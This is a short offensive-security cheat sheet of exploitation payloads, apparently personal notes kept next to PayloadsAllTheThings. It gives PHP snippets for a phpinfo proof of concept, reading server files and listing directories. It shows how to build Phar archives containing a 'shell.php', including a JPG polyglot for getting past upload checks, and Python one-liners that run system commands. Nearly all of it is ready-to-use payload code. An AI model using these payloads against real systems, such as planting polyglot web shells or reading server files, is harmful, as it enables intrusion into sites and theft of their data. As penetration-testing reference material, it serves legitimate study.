Exploitation Payloads
PayloadsAllTheThings is the way to go, but I noted down some of mine.
PHP
PHP Info POC
We often run phpinfo
to get information.
<?php phpinfo() ?>
Read a file
There are multiple functions you might use:
<?php
$fileContents = file_get_contents('index.php');
$fileContents = show_source('index.php', true);
$fileContents = highlight_file('index.php', true);
$fileContents = readfile('index.php');
echo $fileContents;
?>
Base64 encoding is not always necessary, especially with show_source
.
$fileContents = base64_encode($fileContents);
Execute Shell Commands
Refer to webshells#php.
List files in directory
A few different ways to achieve the same output:
<?php
var_dump(scandir("."));
$files = scandir(".");
foreach ($files as $file) {
echo $file;
}
$dir=dir('.');
while ($f = $dir->read()) {
echo $f;
}
$dir = opendir(".");
while($f = readdir($dir)) {
echo $f;
}
Phar
Simply zipping the PHP may work. Otherwise, you can use:
<?php // Run 'php --define phar.readonly=0 gen.php'
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
// or: $phar->addFile('shell.php', 'shell.php');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
β‘οΈ shell.php
is the file inside the archive.
To create a Polyglot Phar (Ex: JPG with \xff\xd8 and \xff\xd9)
<?php // php --define phar.readonly=0 gen.php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
$phar->setStub("\xff\xd8\xff\xd9\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();
π For reference, include 'phar://./shell.phar/shell.php';
Python
Simple python code to run a command.
import os;os.system('ls -1a');
import os;os.popen("ls -1a").read();
import subprocess; subprocess.run(['ls', '-1a']);
import subprocess;print(subprocess.run("whoami", shell=True, stdout=subprocess.PIPE, text=True).stdout)